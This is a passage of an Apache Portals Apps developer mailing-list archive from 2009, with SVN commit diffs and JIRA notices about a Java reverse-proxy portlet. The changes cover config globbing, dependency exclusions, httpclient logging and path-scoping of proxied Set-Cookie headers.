getResourceAsFile(resourcePath, classloader, context); + File parent = file.getParentFile(); + FilenameFilter filter = new GlobFilenameFilter(file.getName()); + return parent.listFiles(filter); } public static InputStream getResourceAsStream(String resourcePath) throws IOException Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/web.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/web.xml?rev=822653&r1=822652&r2=822653&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/web.xml (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/web.xml Wed Oct 7 10:50:47 2009 @@ -53,7 +53,7 @@ <servlet-class>org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyServlet</servlet-class> <init-param> <param-name>reverseproxy.configuration</param-name> - <param-value>/WEB-INF/conf/reverseproxy.properties</param-value> + <param-value>/WEB-INF/conf/reverseproxy*.properties</param-value> </init-param> <init-param> <param-name>reverseproxy.configuration.refresh.delay</param-name> From [email protected] Thu Oct 29 17:50:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55061 invoked from network); 29 Oct 2009 17:50:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Oct 2009 17:50:28 -0000 Received: (qmail 17213 invoked by uid 500); 29 Oct 2009 17:50:28 -0000 Delivered-To: [email protected] Received: (qmail 17187 invoked by uid 500); 29 Oct 2009 17:50:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17176 invoked by uid 99); 29 Oct 2009 17:50:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Oct 2009 17:50:28 +0000 X-ASF-Spam-Status: No, hits=-10.5 required=5.0 tests=AWL,BAYES_00,RCVD_IN_DNSWL_HI X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Oct 2009 17:50:19 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 65CD0234C045 for <[email protected]>; Thu, 29 Oct 2009 10:49:59 -0700 (PDT) Message-ID: <304340513.1256838599401.JavaMail.jira@brutus> Date: Thu, 29 Oct 2009 17:49:59 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (APA-17) Remembering the last page url visited by the IFrame portlet. In-Reply-To: <1187343889.1253522416109.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/APA-17?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Woonsan Ko resolved APA-17. --------------------------- Resolution: Fixed Fixed by a client-side javascript solution. The javascript tries to attach window event on the target frame to store the visited page by invoking portlet resource url to store the url into session. > Remembering the last page url visited by the IFrame portlet. > ------------------------------------------------------------- > > Key: APA-17 > URL: https://issues.apache.org/jira/browse/APA-17 > Project: Portals Apps > Issue Type: Improvement > Components: apa-webcontent > Affects Versions: apa-webcontent-1.0 > Reporter: Woonsan Ko > Assignee: Woonsan Ko > Fix For: apa-webcontent-1.1 > > > Currently, if the page containing the IFrame portlet is refreshed or revisited, then the IFrame content is back to the original SRC url. > The option to remember last page url should be very helpful in most cases. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Oct 29 17:52:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55357 invoked from network); 29 Oct 2009 17:52:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Oct 2009 17:52:24 -0000 Received: (qmail 21259 invoked by uid 500); 29 Oct 2009 17:52:23 -0000 Delivered-To: [email protected] Received: (qmail 21231 invoked by uid 500); 29 Oct 2009 17:52:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21214 invoked by uid 99); 29 Oct 2009 17:52:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Oct 2009 17:52:22 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Oct 2009 17:52:20 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 82174234C1EF for <[email protected]>; Thu, 29 Oct 2009 10:51:59 -0700 (PDT) Message-ID: <308.601.5859.1256838719531.JavaMail.jira@brutus> Date: Thu, 29 Oct 2009 17:51:59 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (APA-18) Reverse proxied web contents' Set-Cookie headers should be scoped in a path. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Reverse proxied web contents' Set-Cookie headers should be scoped in a path. ---------------------------------------------------------------------------- Key: APA-18 URL: https://issues.apache.org/jira/browse/APA-18 Project: Portals Apps Issue Type: Bug Affects Versions: apa-webcontent-1.1 Reporter: Woonsan Ko Assignee: Woonsan Ko Fix For: apa-webcontent-1.1 Reverse proxied web contents' Set-Cookie headers should be scoped in a path. If not, some critical cookie value such as JSESSIONID must be overwritten unexpectedly, causing the current session gone. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Oct 30 09:11:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87287 invoked from network); 30 Oct 2009 09:11:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 09:11:23 -0000 Received: (qmail 72422 invoked by uid 500); 30 Oct 2009 09:11:23 -0000 Delivered-To: [email protected] Received: (qmail 72396 invoked by uid 500); 30 Oct 2009 09:11:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72386 invoked by uid 99); 30 Oct 2009 09:11:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 09:11:23 +0000 X-ASF-Spam-Status: No, hits=-2.6 required=5.0 tests=BAYES_00 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 09:11:21 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DF33723888C2; Fri, 30 Oct 2009 09:10:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r831234 - /portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Date: Fri, 30 Oct 2009 09:10:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: woonsan Date: Fri Oct 30 09:10:59 2009 New Revision: 831234 URL: http://svn.apache.org/viewvc?rev=831234&view=rev Log: APA-18: Setting path for proxy response cookies. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=831234&r1=831233&r2=831234&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Fri Oct 30 09:10:59 2009 @@ -24,12 +24,14 @@ import java.io.Reader; import java.io.Writer; import java.util.ArrayList; +import java.util.Date; import java.util.Enumeration; import java.util.List; import java.util.Map; import java.util.zip.GZIPInputStream; import java.util.zip.GZIPOutputStream; +import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; @@ -61,6 +63,7 @@ import org.apache.http.conn.scheme.SchemeRegistry; import org.apache.http.conn.ssl.SSLSocketFactory; import org.apache.http.entity.InputStreamEntity; +import org.apache.http.impl.client.BasicCookieStore; import org.apache.http.impl.client.DefaultHttpClient; import org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager; import org.apache.http.impl.cookie.BasicClientCookie; @@ -226,8 +229,24 @@ proxyTargetURL = new StringBuilder(proxyTargetURL.length() + 1 + queryString.length()).append(proxyTargetURL).append('?').append(queryString).toString(); } + final List<org.apache.http.cookie.Cookie> responseSetCookies = new ArrayList<org.apache.http.cookie.Cookie>(); // create http client for each request... - DefaultHttpClient httpClient = new DefaultHttpClient(connectionManager, clientParams); + DefaultHttpClient httpClient = new DefaultHttpClient(connectionManager, clientParams) + { + @Override + protected CookieStore createCookieStore() + { + return new BasicCookieStore() + { + @Override + public void addCookie(org.apache.http.cookie.Cookie cookie) + { + responseSetCookies.add(cookie); + } + }; + } + }; + // redirection should be adjusted with local host header... httpClient.getParams().setBooleanParameter(ClientPNames.HANDLE_REDIRECTS, false); @@ -464,6 +483,9 @@ if (rewritable && StringUtils.equalsIgnoreCase(headerName, HTTP.CONTENT_LEN)) continue; + if (StringUtils.startsWithIgnoreCase(headerName, "Set-Cookie")) + continue; + String headerValue = header.getValue(); if (StringUtils.equalsIgnoreCase(headerName, HTTP.TARGET_HOST)) @@ -478,10 +500,27 @@ String rewriterContextPath = localBaseURL; - if (rewriterContextPath == null) { + if (rewriterContextPath == null) + { rewriterContextPath = request.getContextPath() + request.getServletPath(); } + for (org.apache.http.cookie.Cookie cookie : responseSetCookies) + { + Cookie responseCookie = new Cookie(cookie.getName(), cookie.getValue()); + responseCookie.setComment(cookie.getComment()); + Date expireDate = cookie.getExpiryDate(); + if (expireDate != null) + { + int maxAgeSeconds = (int) ((expireDate.getTime() - System.currentTimeMillis()) / 1000L); + responseCookie.setMaxAge(maxAgeSeconds); + } + responseCookie.setPath(rewriterContextPath + proxyPathMapper.getLocalBasePath()); + responseCookie.setSecure(cookie.isSecure()); + responseCookie.setVersion(cookie.getVersion()); + response.addCookie(responseCookie); + } + // Send the content to the client writeHttpEntityToClient(response, httpEntity, proxyPathMapper, rewriterContextPath, localPathInfo, rewriter, parserAdaptor); } From [email protected] Fri Oct 30 09:29:53 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90999 invoked from network); 30 Oct 2009 09:29:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 09:29:53 -0000 Received: (qmail 95626 invoked by uid 500); 30 Oct 2009 09:29:53 -0000 Delivered-To: [email protected] Received: (qmail 95601 invoked by uid 500); 30 Oct 2009 09:29:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 90382 invoked by uid 99); 30 Oct 2009 09:26:48 -0000 X-ASF-Spam-Status: No, hits=-2.6 required=5.0 tests=BAYES_00 X-Spam-Check-By: apache.org Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r831235 - /portals/applications/webcontent/trunk/webcontent-jar/pom.xml Date: Fri, 30 Oct 2009 09:26:26 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: ate Date: Fri Oct 30 09:26:25 2009 New Revision: 831235 URL: http://svn.apache.org/viewvc?rev=831235&view=rev Log: Fix commons-beanutils dependency issues (beanutils, beanutils-core and sometimes also beanutils-collections being pulled in together) Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/pom.xml?rev=831235&r1=831234&r2=831235&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/pom.xml (original) +++ portals/applications/webcontent/trunk/webcontent-jar/pom.xml Fri Oct 30 09:26:25 2009 @@ -172,6 +172,10 @@ <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> </exclusion> + <exclusion> + <groupId>commons-beanutils</groupId> + <artifactId>commons-beanutils-core</artifactId> + </exclusion> </exclusions> </dependency> <dependency> From [email protected] Fri Oct 30 11:13:11 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13080 invoked from network); 30 Oct 2009 11:13:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 11:13:10 -0000 Received: (qmail 6175 invoked by uid 500); 30 Oct 2009 11:13:10 -0000 Delivered-To: [email protected] Received: (qmail 6150 invoked by uid 500); 30 Oct 2009 11:13:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6140 invoked by uid 99); 30 Oct 2009 11:13:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 11:13:10 +0000 X-ASF-Spam-Status: No, hits=-2.6 required=5.0 tests=BAYES_00 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 11:13:08 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9B4B023888E5; Fri, 30 Oct 2009 11:12:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r831263 - /portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties Date: Fri, 30 Oct 2009 11:12:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: woonsan Date: Fri Oct 30 11:12:43 2009 New Revision: 831263 URL: http://svn.apache.org/viewvc?rev=831263&view=rev Log: APA-18: Adding httpclient logging configuration Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties?rev=831263&r1=831262&r2=831263&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/classes/log4j.properties Fri Oct 30 11:12:43 2009 @@ -35,6 +35,12 @@ log4j.category.velocity = ERROR, velocity log4j.additivity.velocity = false +# +# HTTP Client +# +log4j.category.org.apache.http = ERROR, httpclient +log4j.category.org.apache.http.wire = ERROR, httpclient + ######################################################################## # # Logfile definitions @@ -58,3 +64,12 @@ log4j.appender.velocity.layout = org.apache.log4j.PatternLayout log4j.appender.velocity.layout.conversionPattern = %d [%t] %-5p %c - %m%n log4j.appender.velocity.append = false + +# +# webcontent-httpclient.log +# +log4j.appender.httpclient = org.apache.log4j.FileAppender +log4j.appender.httpclient.file = ${org.apache.portals.logdir}/webcontent-httpclient.log +log4j.appender.httpclient.layout = org.apache.log4j.PatternLayout +log4j.appender.httpclient.layout.conversionPattern = %d [%t] %-5p %c - %m%n +log4j.appender.httpclient.append = false From [email protected] Fri Oct 30 12:22:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27996 invoked from network); 30 Oct 2009 12:22:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 12:22:23 -0000 Received: (qmail 72498 invoked by uid 500); 30 Oct 2009 12:22:23 -0000 Delivered-To: [email protected] Received: (qmail 72471 invoked by uid 500); 30 Oct 2009 12:22:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72461 invoked by uid 99); 30 Oct 2009 12:22:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 12:22:22 +0000 X-ASF-Spam-Status: No, hits=-2.6 required=5.0 tests=AWL,BAYES_00 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 12:22:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3B81F23888CE; Fri, 30 Oct 2009 12:21:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r831280 - /portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Date: Fri, 30 Oct 2009 12:21:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: woonsan Date: Fri Oct 30 12:21:58 2009 New Revision: 831280 URL: http://svn.apache.org/viewvc?rev=831280&view=rev Log: APA-18: Setting path for proxy response cookies for each case, including HTTP 302 case. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=831280&r1=831279&r2=831280&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Fri Oct 30 12:21:58 2009 @@ -377,6 +377,13 @@ HttpResponse httpResponse = httpClient.execute(httpRequest); httpEntity = httpResponse.getEntity(); + String rewriterContextPath = localBaseURL; + + if (rewriterContextPath == null) + { + rewriterContextPath = request.getContextPath() + request.getServletPath(); + } + int statusCode = httpResponse.getStatusLine().getStatusCode(); // Check if the proxy response is a redirect @@ -425,11 +432,12 @@ } else { - if (localBaseURL != null) { - redirectLocation = localBaseURL + localPath; - } else { - redirectLocation = request.getContextPath() + request.getServletPath() + localPath; - } + redirectLocation = rewriterContextPath + localPath; + } + + if (!responseSetCookies.isEmpty()) + { + addResponseCookies(response, responseSetCookies, rewriterContextPath + proxyPathMapper.getLocalBasePath()); } response.sendRedirect(redirectLocation); @@ -447,6 +455,11 @@ response.setIntHeader(HTTP.CONTENT_LEN, 0); response.setStatus(HttpServletResponse.SC_NOT_MODIFIED); + if (!responseSetCookies.isEmpty()) + { + addResponseCookies(response, responseSetCookies, rewriterContextPath + proxyPathMapper.getLocalBasePath()); + } + return; } else @@ -498,27 +511,9 @@ } } - String rewriterContextPath = localBaseURL; - - if (rewriterContextPath == null) + if (!responseSetCookies.isEmpty()) { - rewriterContextPath = request.getContextPath() + request.getServletPath(); - } - - for (org.apache.http.cookie.Cookie cookie : responseSetCookies) - { - Cookie responseCookie = new Cookie(cookie.getName(), cookie.getValue()); - responseCookie.setComment(cookie.getComment()); - Date expireDate = cookie.getExpiryDate(); - if (expireDate != null) - { - int maxAgeSeconds = (int) ((expireDate.getTime() - System.currentTimeMillis()) / 1000L); - responseCookie.setMaxAge(maxAgeSeconds); - } - responseCookie.setPath(rewriterContextPath + proxyPathMapper.getLocalBasePath()); - responseCookie.setSecure(cookie.isSecure()); - responseCookie.setVersion(cookie.getVersion()); - response.addCookie(responseCookie); + addResponseCookies(response, responseSetCookies, rewriterContextPath + proxyPathMapper.getLocalBasePath()); } // Send the content to the client @@ -567,6 +562,28 @@ } } + private void addResponseCookies(HttpServletResponse response, List<org.apache.http.cookie.Cookie> responseSetCookies, String cookiePath) + { + for (org.apache.http.cookie.Cookie cookie : responseSetCookies) + { + Cookie responseCookie = new Cookie(cookie.getName(), cookie.getValue()); + responseCookie.setComment(cookie.getComment()); + Date expireDate = cookie.getExpiryDate(); + + if (expireDate != null) + { + int maxAgeSeconds = (int) ((expireDate.getTime() - System.currentTimeMillis()) / 1000L); + responseCookie.setMaxAge(maxAgeSeconds); + } + + responseCookie.setPath(cookiePath); + responseCookie.setSecure(cookie.isSecure()); + responseCookie.setVersion(cookie.getVersion()); + + response.addCookie(responseCookie); + } + } + private void writeHttpEntityToClient(HttpServletResponse response, HttpEntity httpEntity, HttpReverseProxyPathMapper proxyPathMapper, From [email protected] Fri Oct 30 12:35:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34776 invoked from network); 30 Oct 2009 12:35:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 12:35:23 -0000 Received: (qmail 86146 invoked by uid 500); 30 Oct 2009 12:35:23 -0000 Delivered-To: [email protected] Received: (qmail 86123 invoked by uid 500); 30 Oct 2009 12:35:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86113 invoked by uid 99); 30 Oct 2009 12:35:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 12:35:23 +0000 X-ASF-Spam-Status: No, hits=-10.5 required=5.0 tests=AWL,BAYES_00,RCVD_IN_DNSWL_HI X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 12:35:21 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6DCAA234C045 for <[email protected]>; Fri, 30 Oct 2009 05:34:59 -0700 (PDT) Message-ID: <837394355.1256906099435.JavaMail.jira@brutus> Date: Fri, 30 Oct 2009 12:34:59 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (APA-18) Reverse proxied web contents' Set-Cookie headers should be scoped in a path. In-Reply-To: <308.601.5859.1256838719531.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/APA-18?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Woonsan Ko resolved APA-18. --------------------------- Resolution: Fixed Fixed. Response cookies from the target host are automatically path-scoped. > Reverse proxied web contents' Set-Cookie headers should be scoped in a path. > ---------------------------------------------------------------------------- > > Key: APA-18 > URL: https://issues.apache.org/jira/browse/APA-18 > Project: Portals Apps > Issue Type: Bug > Affects Versions: apa-webcontent-1.1 > Reporter: Woonsan Ko > Assignee: Woonsan Ko > Fix For: apa-webcontent-1.1 > > > Reverse proxied web contents' Set-Cookie headers should be scoped in a path. > If not, some critical cookie value such as JSESSIONID must be overwritten unexpectedly, causing the current session gone. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Oct 30 16:44:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22719 invoked from network); 30 Oct 2009 16:44:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 16:44:25 -0000 Received: (qmail 95090 invoked by uid 500); 30 Oct 2009 16:44:25 -0000 Delivered-To: [email protected] Received: (qmail 95063 invoked by uid 500); 30 Oct 2009 16:44:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95053 invoked by uid 99); 30 Oct 2009 16:44:24 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 16:44:24 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 16:44:22 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 37C2B234C1F0 for <[email protected]>; Fri, 30 Oct 2009 09:44:01 -0700 (PDT) Message-ID: <127149206.1256921041226.JavaMail.jira@brutus> Date: Fri, 30 Oct 2009 16:44:01 +0000 (UTC) From: "Woonsan Ko (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (APA-19) Some website's' content height cannot be detected by offsetHeight. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Some website's' content height cannot be detected by offsetHeight. ------------------------------------------------------------------ Key: APA-19 URL: https://issues.apache.org/jira/browse/APA-19 Project: Portals Apps Issue Type: Bug Components: apa-webcontent Affects Versions: apa-webcontent-1.1 Reporter: Woonsan Ko Assignee: Woonsan Ko Fix For: apa-webcontent-1.1 with autoresize option in the reverse proxy iframe portlet, some website's page's height is not detected properly. (e.g. JIRA) In that case, it is helpful to compare with the scrollHeight if it is avaiable. Sometimes scrollHeight can reflect the real height of the content. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Oct 30 16:44:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22914 invoked from network); 30 Oct 2009 16:44:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Oct 2009 16:44:50 -0000 Received: (qmail 97444 invoked by uid 500); 30 Oct 2009 16:44:50 -0000 Delivered-To: [email protected] Received: (qmail 97418 invoked by uid 500); 30 Oct 2009 16:44:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97408 invoked by uid 99); 30 Oct 2009 16:44:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 16:44:50 +0000 X-ASF-Spam-Status: No, hits=-2.6 required=5.0 tests=BAYES_00 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Oct 2009 16:44:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 200D823888DA; Fri, 30 Oct 2009 16:44:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r831378 - 